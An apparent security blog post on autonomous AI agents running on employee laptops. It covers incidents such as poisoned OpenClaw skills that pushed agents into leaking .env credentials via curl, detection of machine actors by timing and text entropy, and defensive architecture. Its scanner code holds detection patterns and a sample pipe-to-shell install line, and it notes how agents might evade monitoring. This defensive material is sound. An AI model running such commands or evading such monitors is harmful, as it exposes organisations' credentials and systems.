There is a class of threat that doesn't show up in your cloud security logs, your SaaS access policies, or your proxy allowlists. It runs on employee hardware. It authenticates using employee credentials. It talks to your internal APIs with employee-level permissions. But it isn't an employee. It's an autonomous agent — an LLM with shell access, tool integrations, and the ability to plan and execute multi-step operations — running locally on a laptop inside your corporate network.
This is shadow AI's final form. Not an employee pasting code into ChatGPT — which your DLP might catch — but an autonomous machine actor embedded in your workforce, invisible to every security control designed for cloud-hosted AI. The frameworks that enable it — OpenClaw, Ollama, LM Studio — are now mainstream, well-documented, and trivial to install. OpenClaw alone has over 196,000 GitHub stars. The question is no longer whether your employees are running local agents. It's how many, and what those agents have access to.
Why your security stack can't see them
Cloud-based AI security works because traffic is routable to a known endpoint. You can block api.openai.com. You can inspect outbound requests to claude.ai. You can detect data uploads to generative AI services by watching egress patterns.
Local agents bypass all of this. Ollama runs inference on the device itself. No outbound model calls. No cloud API to intercept. The agent connects to your internal services — Slack, GitHub, Jira, databases — using the same OAuth tokens, SSH keys, and API credentials the employee already has. From the perspective of your IAM system, it's indistinguishable from a human user performing the same operations. Except it performs them at machine speed, without pausing, without typos, and without the behavioral variance that makes human traffic identifiable.
No cloud egress to intercept
Inference runs on-device via Ollama, LM Studio, or llama.cpp. No API calls leave the machine to a known AI provider. Your proxy and DLP see nothing because there is nothing to see at the network boundary.
Employee-level credential access
Agents use the host machine's credential store — OAuth tokens, SSH keys, environment variables, browser cookies. They operate with the full privilege of the logged-in user, and IAM sees a valid authenticated session.
Shell + tool execution
OpenClaw and similar frameworks give agents direct shell access, file system read/write, and tool integrations via MCP. The agent can run git commands, curl data, and modify infrastructure. These actions look like developer activity.
Channel integrations
OpenClaw connects to Slack, Discord, Telegram, and GitHub out of the box. A skill-based architecture allows modular capability expansion. Once connected, the agent is a permanent, autonomous participant in your collaboration infrastructure.
The incidents that define this threat
These are not theoretical risks. Each of these incidents has been publicly documented, analyzed, and attributed.
- Jan 2026: 175,000 Exposed Ollama Servers (SentinelOne / Censys) [Critical]
  A 293-day study found over 175,000 publicly accessible Ollama instances across 130 countries. 48% supported tool-calling capabilities, meaning they could execute code and interact with external systems. 13% of hosts were persistent, accounting for 76% of all observed activity. Root cause: users reconfigured the service to bind to 0.0.0.0 without adding authentication. Attackers commercialized access through marketplaces like "silver.inc" in a campaign called "Operation Bizarre Bazaar."
- Jan-Feb 2026: ClawHavoc, Supply Chain Poisoning at Scale [Critical]
  Attackers uploaded 1,184 malicious skills to ClawHub, OpenClaw's official skill marketplace. Skills used "ClickFix" social engineering: professional documentation with a "Prerequisites" section that tricked users into executing shell commands or downloading password-protected ZIPs. Primary payload: Atomic macOS Stealer (AMOS), capable of harvesting Keychain passwords, browser data, crypto wallets, and SSH keys. Additional payloads included reverse shells for persistent remote access. ClawHub required only a one-week-old GitHub account to publish.
- 2026: CVE-2026-25253, OpenClaw One-Click RCE [Critical]
  A cross-site WebSocket hijacking vulnerability in OpenClaw allowed one-click remote code execution. Attackers could bypass the sandbox and execute arbitrary commands on the host machine by exploiting the default gateway binding to 0.0.0.0:18789. CVSS 8.8. Early OpenClaw versions exposed this port with no authentication by default.
- Ongoing: Credential Exfiltration via Malicious Skills [High]
  Cisco demonstrated that a single malicious OpenClaw skill could silently exfiltrate the agent's entire .env file (containing API keys, database credentials, and service tokens) using a disguised curl command. The user never sees the exfiltration because OpenClaw truncates tool output in its interface. The agent performs the action as part of what appears to be normal task execution.
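Two of these incidents trace back to a service listening on 0.0.0.0 instead of loopback, which is cheap to audit for. The following is a minimal sketch, assuming you can collect each agent's bind setting as a string (for Ollama, the value of the `OLLAMA_HOST` environment variable). The function name `is_exposed_bind` is hypothetical, and IPv6 literals are assumed to be bracketed.

```python
import ipaddress
from urllib.parse import urlsplit


def is_exposed_bind(bind: str) -> bool:
    """Return True if a bind address listens beyond the loopback interface."""
    # Accept "host", "host:port", or "scheme://host:port" (assumed input shapes).
    target = bind if "://" in bind else f"//{bind}"
    host = urlsplit(target).hostname or ""
    if host in ("", "localhost"):
        # Unset or localhost: treated as loopback-only.
        return False
    try:
        return not ipaddress.ip_address(host).is_loopback
    except ValueError:
        # A non-IP hostname: report it as exposed so a human reviews it.
        return True


for value in ("127.0.0.1:11434", "0.0.0.0:11434", "http://0.0.0.0:18789"):
    print(value, "exposed" if is_exposed_bind(value) else "loopback only")
```

A check like this only tells you what the service is configured to do; it says nothing about whether authentication sits in front of it.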
The deep research question: liveness and attribution for machine actors
This is the central technical problem. When a local agent uses employee credentials to call your internal APIs, how do you know the request came from a machine and not the person whose credentials it's using?
The answer is that you can't know — not from a single request. But over a sequence of requests, machine actors produce patterns that are statistically distinguishable from human behavior. The research on this is converging from three directions.
1. Timing entropy
Human interaction is noisy. Inter-keystroke timing, mouse trajectories, request spacing — all of it exhibits high variance. Agents are the opposite. Even when jittered, automated request sequences show lower entropy than human-generated sequences because the source of randomness is algorithmic, not biological.
The 20% entropy gap is measurable and consistent across studies. But timing alone isn't sufficient — a well-tuned jitter function can narrow the gap. What matters is the combination of timing entropy with other behavioral signals.
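To make "timing entropy" concrete, here is a rough sketch that bins the gaps between consecutive requests and computes the Shannon entropy of the resulting histogram. The 100 ms bin width and the function name `timing_entropy` are assumptions for illustration, not parameters taken from the studies.

```python
import math
from collections import Counter


def timing_entropy(timestamps: list[float], bin_width: float = 0.1) -> float:
    """Shannon entropy (bits) of binned gaps between consecutive requests."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    if not gaps:
        return 0.0
    # Bucket each gap so that near-identical spacings land in the same bin.
    bins = Counter(int(gap // bin_width) for gap in gaps)
    total = len(gaps)
    return -sum((n / total) * math.log2(n / total) for n in bins.values())


bot_like = [0.0, 1.0, 2.0, 3.0, 4.0]        # perfectly regular spacing
human_like = [0.0, 0.35, 1.9, 2.0, 4.7]     # irregular spacing
print(timing_entropy(bot_like), timing_entropy(human_like))
```

In practice the score is only meaningful over a long window of requests and relative to a per-identity baseline, since a handful of samples can look regular or irregular by chance.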
2. Linguistic entropy
When agents interact with text-based interfaces — Slack messages, GitHub comments, Jira updates — the generated text has a different statistical profile than human writing. AI-generated text shows higher noun density and coordinating conjunction frequency. Human text is richer in adjectives, adpositions, and pronouns. The content-word-to-function-word ratio is measurably different.
More importantly, AI text has lower linguistic entropy — it is more predictable at the token level. A Longformer-based classifier trained on these features can distinguish between human and AI-generated messages, though performance varies significantly by domain and model. The practical implication: a monitoring system that analyzes the text content of Slack messages and Git commit messages from a given user identity can flag statistically anomalous authorship patterns.
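One of the simpler features mentioned above, the content-word-to-function-word ratio, can be approximated without any model at all. This is a crude sketch: the tiny `FUNCTION_WORDS` list is an illustrative assumption, and a real pipeline would use a part-of-speech tagger and feed the ratio into a classifier rather than read it directly.

```python
import re

# A tiny illustrative function-word list (assumption); a real system would use a POS tagger.
FUNCTION_WORDS = frozenset(
    "a an the and or but of in on at to for with by from as is are was were be "
    "it this that these those i you he she we they my your our their".split()
)


def content_function_ratio(text: str) -> float:
    """Ratio of content words to function words in a message."""
    words = re.findall(r"[a-z']+", text.lower())
    function = sum(1 for w in words if w in FUNCTION_WORDS)
    content = len(words) - function
    # Treat zero function words as one to avoid dividing by zero.
    return content / max(function, 1)


print(content_function_ratio("the cat sat on the mat"))
print(content_function_ratio("Deploy pipeline updated"))
```

A single message proves nothing; the signal is a shift in this ratio across many messages from one identity compared with that identity's own history.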
3. Multi-modal behavioral fusion
The current state of the art combines timing, linguistic, and interaction-pattern signals into a single feature vector. Mouse trajectories (velocity, acceleration, curvature), scroll behavior, click pressure, and keystroke cadence provide ground-truth human interaction signals that no API-only agent can produce. LSTM and GRU models trained on these fused feature sets achieve classification accuracy around 97%, categorizing traffic into four tiers: Human, Basic Bot, Advanced Bot, and Human-like Bot.
The fundamental constraint: Local agents that only interact via API (Slack API, GitHub API, database connections) produce no mouse, keyboard, or scroll signals at all. Their absence is itself a detection signal. A user identity that generates hundreds of Slack messages and Git commits per day but produces zero endpoint interaction telemetry is, by definition, not a human.
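The absence check is the easiest of these signals to operationalize. Below is a minimal sketch, assuming you can join per-identity API activity counts with endpoint interaction counts for the same time window. The record type `IdentityActivity`, its fields, and the threshold of 100 actions are hypothetical.

```python
from dataclasses import dataclass


@dataclass
class IdentityActivity:
    user: str
    api_actions: int          # e.g. Slack messages plus Git commits in the window
    interaction_events: int   # keyboard, mouse, and scroll events from the endpoint sensor


def flag_silent_identities(rows: list[IdentityActivity], min_actions: int = 100) -> list[str]:
    """Return users with heavy API activity but zero endpoint interaction."""
    return [
        r.user
        for r in rows
        if r.api_actions >= min_actions and r.interaction_events == 0
    ]


window = [
    IdentityActivity("alice", api_actions=240, interaction_events=0),
    IdentityActivity("bob", api_actions=180, interaction_events=5120),
    IdentityActivity("carol", api_actions=3, interaction_events=0),
]
print(flag_silent_identities(window))
```

The volume threshold matters: a user on leave also produces zero interaction telemetry, so the flag should only fire when API activity is high at the same time.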
Building the detection stack
Detecting invisible agents requires operating at the endpoint — not the network boundary. CrowdStrike's Spring 2026 release made this explicit by positioning the Falcon sensor as the primary detection surface for shadow AI, introducing three capabilities that didn't exist 12 months ago.
Steps 01 through 03 are commercially available today. Step 04 — behavioral entropy analysis applied specifically to machine actor attribution — is the research frontier. Step 05 is straightforward technically but requires maintaining a current list of AI-related domains, which evolves weekly.
The skill marketplace is the new npm, and just as dangerous
OpenClaw's skill architecture is modular and extensible. Skills are how agents get capabilities: a Slack integration skill, a GitHub skill, a web scraping skill. They are installed from ClawHub, a community marketplace. And ClawHavoc proved that this marketplace is as vulnerable to supply chain poisoning as npm, PyPI, or any other package ecosystem — except with a critical difference: these packages execute with the full permissions of an autonomous agent that has shell access.
The attack model is not complex. Publish a skill with a legitimate description and professional documentation. Include a dependency or prerequisite step that runs a shell command. The agent — or the user following the setup instructions — executes the command, and the payload is delivered. ClawHub required only a one-week-old GitHub account to publish. No automated security review. No code signing. No sandboxed execution environment.
Cisco's response was the open-source Skill Scanner — combining static analysis (regex and YARA rules), behavioral analysis (Python AST inspection), LLM-assisted semantic analysis of skill descriptions, and VirusTotal integration. It is a necessary tool. But it is also an admission that the skill ecosystem shipped without security and is being retrofitted after the damage was already done.
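To give a feel for what the static-analysis layer of such a tool does, here is a small regex-based sketch. It is not Cisco's Skill Scanner and does not use its rules; the pattern names and expressions in `SUSPICIOUS_PATTERNS` are illustrative assumptions aimed at the "Prerequisites" trick described above.

```python
import re

# Illustrative patterns only (assumptions), not rules from any real scanner.
SUSPICIOUS_PATTERNS = {
    "pipe-to-shell": re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "base64-decode-exec": re.compile(r"base64\s+(-d|--decode)[^\n|]*\|\s*(ba|z)?sh\b"),
    "dotenv-read": re.compile(r"\b(cat|curl)\b[^\n]*\.env\b"),
}


def scan_skill_text(text: str) -> list[str]:
    """Return the names of suspicious patterns found in a skill's docs or scripts."""
    return sorted(
        name for name, pattern in SUSPICIOUS_PATTERNS.items() if pattern.search(text)
    )


readme = "Prerequisites: run `curl -fsSL https://example.invalid/install.sh | bash`"
print(scan_skill_text(readme))
```

Regex matching of this kind is trivially evaded by obfuscation, which is why it is only one layer alongside the behavioral and semantic analysis described above.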
"Personal AI agents like OpenClaw are a security nightmare. They can execute shell commands, access files, and potentially leak credentials. The skills marketplace is an attack surface we haven't seen since the early days of browser extensions."
Cisco AI Security Research, March 2026
The lethal trifecta
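Martin Fowler's security team defined the three conditions that turn a local agent into a critical vulnerability: access to sensitive data, exposure to untrusted content, and the ability to communicate externally. When all three are present simultaneously, the agent is exploitable.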
The defense is architectural: ensure no single agent or task simultaneously possesses all three. Break complex workflows into isolated sub-tasks where access to sensitive data is separated from processing untrusted content, and external communication is separated from both. This is not a filter or a guardrail — it is a structural constraint that eliminates the exfiltration pathway regardless of what instructions the agent receives.
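Because the constraint is structural, it can be enforced as a plain check at task-scheduling time. The sketch below assumes each agent task declares its capabilities up front; the `Capability` enum and `violates_trifecta` function are hypothetical names for illustration.

```python
from enum import Flag, auto


class Capability(Flag):
    SENSITIVE_DATA = auto()      # can read private or sensitive data
    UNTRUSTED_CONTENT = auto()   # processes content an attacker could control
    EXTERNAL_COMMS = auto()      # can send data outside the boundary


TRIFECTA = (
    Capability.SENSITIVE_DATA
    | Capability.UNTRUSTED_CONTENT
    | Capability.EXTERNAL_COMMS
)


def violates_trifecta(granted: Capability) -> bool:
    """True if a single task holds all three capabilities at once."""
    return (granted & TRIFECTA) == TRIFECTA


summarize_inbox = Capability.SENSITIVE_DATA | Capability.UNTRUSTED_CONTENT
print(violates_trifecta(summarize_inbox))   # two of three: allowed
print(violates_trifecta(TRIFECTA))          # all three: rejected
```

A scheduler that refuses to launch any task for which this returns True forces the workflow split described above, independent of what the prompt or a poisoned skill says.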
The walled garden: secure local AI done right
Banning local AI is not a viable strategy. Employees use it because it solves real productivity problems, and a blanket ban pushes usage underground — exactly where you have zero visibility. The alternative is a controlled deployment architecture that preserves the benefits of local inference while eliminating the attack surface.
- Sovereign inference with vLLM behind a gateway
  Run local inference through vLLM (production) or Ollama (development) inside Kubernetes-managed clusters with GPU passthrough. Bind all endpoints to 127.0.0.1 and expose through a reverse proxy (Nginx, Traefik) with mTLS and OAuth2. No model endpoint is directly reachable from the network. This is the Walled Garden architecture: local inference with enterprise-grade access control.
- Decouple reasoning from knowledge
  The LLM handles reasoning. The vector database holds knowledge. They are separated architecturally. The model never trains on company data. RAG retrieves context from a controlled, internally-hosted vector store (Qdrant, Milvus, or pgvector) using local embedding models. Data sovereignty is maintained because nothing leaves the boundary: not the model weights, not the embeddings, not the queries.
- Skill/tool allow-listing with integrity verification
  No skill or MCP server is installable without passing through a security gate. Run Cisco's Skill Scanner in CI/CD. Pin tool versions with hash verification. Re-audit on every update. Maintain an internal allow-list of approved skills, the same model you use for approved software. ClawHavoc was possible because the default was "anyone can publish, everyone trusts by default." Invert that default.
- Credential isolation for agent processes
  Agents should not inherit the full credential set of the host machine. Issue ephemeral, scoped tokens per agent task. Store them outside the agent's filesystem scope. An agent performing a code review does not need access to production database credentials. The .env file should never be readable by an agent process; this single control would have prevented every credential exfiltration demonstrated in the Cisco research.
- Outbound request allow-listing
  The agent can reach exactly the domains it needs to reach. Nothing else. Restrict outbound traffic from agent processes to a predefined list of approved endpoints. This eliminates the external communication leg of the lethal trifecta. An agent that cannot make outbound requests to attacker-controlled infrastructure cannot exfiltrate data, regardless of what a poisoned skill tells it to do.
- Endpoint telemetry and behavioral baselines
  Install EDR-level monitoring on agent processes. Collect process trees, file access logs, network connections, and request timing. Build per-agent behavioral baselines. Alert on anomalies, not just policy violations. An agent that suddenly starts accessing files outside its normal scope, or contacting an endpoint it has never contacted before, should trigger an immediate investigation.
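The allow-listing control with hash pinning is simple enough to sketch. This example assumes the internal allow-list is a mapping from skill name to a pinned SHA-256 hex digest; the function name `verify_pinned_skill`, the skill name, and the storage format are all hypothetical.

```python
import hashlib
import hmac


def verify_pinned_skill(name: str, payload: bytes, allow_list: dict[str, str]) -> bool:
    """Return True only if the skill is allow-listed and its SHA-256 matches the pin."""
    pinned = allow_list.get(name)
    if pinned is None:
        # Default-deny: a skill that is not on the list is never installable.
        return False
    digest = hashlib.sha256(payload).hexdigest()
    # Constant-time comparison; not strictly required for public hashes, but harmless.
    return hmac.compare_digest(digest, pinned.lower())


approved_bytes = b"def run():\n    return 'ok'\n"
allow_list = {"slack-notify": hashlib.sha256(approved_bytes).hexdigest()}

print(verify_pinned_skill("slack-notify", approved_bytes, allow_list))
print(verify_pinned_skill("slack-notify", approved_bytes + b"# tampered", allow_list))
print(verify_pinned_skill("unknown-skill", approved_bytes, allow_list))
```

Pinning by hash means any upstream update fails verification until someone re-audits it and updates the pin, which is the "re-audit on every update" behavior the list calls for.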
Practical machine actor attribution
The research question — can you distinguish human from AI-generated API traffic based purely on statistical timing and linguistic entropy? — has a practical answer: yes, imperfectly, but well enough to flag suspicious identities for investigation.
Here is what a production attribution pipeline looks like:
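As a minimal sketch of the final scoring stage only, assume the three signals discussed earlier (timing entropy, a linguistic anomaly score, and endpoint interaction counts) have already been computed per identity. The weights, the entropy floor, and the names `IdentitySignals` and `machine_likelihood` are illustrative assumptions, not values from the research.

```python
from dataclasses import dataclass


@dataclass
class IdentitySignals:
    timing_entropy_bits: float   # entropy of request spacing for this identity
    linguistic_anomaly: float    # 0..1 score from a text classifier
    interaction_events: int      # endpoint keyboard and mouse events in the window


def machine_likelihood(s: IdentitySignals, entropy_floor: float = 2.0) -> float:
    """Combine three signals into a 0..1 score; the weights are illustrative."""
    low_entropy = 1.0 if s.timing_entropy_bits < entropy_floor else 0.0
    no_telemetry = 1.0 if s.interaction_events == 0 else 0.0
    return 0.3 * low_entropy + 0.3 * s.linguistic_anomaly + 0.4 * no_telemetry


suspect = IdentitySignals(timing_entropy_bits=0.4, linguistic_anomaly=0.9, interaction_events=0)
typical = IdentitySignals(timing_entropy_bits=4.1, linguistic_anomaly=0.1, interaction_events=800)
print(machine_likelihood(suspect), machine_likelihood(typical))
```

The output is a triage score for an analyst queue, not a verdict: a high value means "investigate this identity", in line with the imperfect-but-useful framing above.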
This is not a solved problem. A sufficiently sophisticated agent could introduce artificial variance, generate more human-like text, or even simulate endpoint interaction patterns. But the current generation of local agents — OpenClaw, Ollama-based workflows, LM Studio setups — don't do any of this. They produce clearly machine-like traffic patterns because they weren't designed to evade detection. They were designed to be productive. That makes right now the window to build the detection infrastructure before the evasion techniques catch up.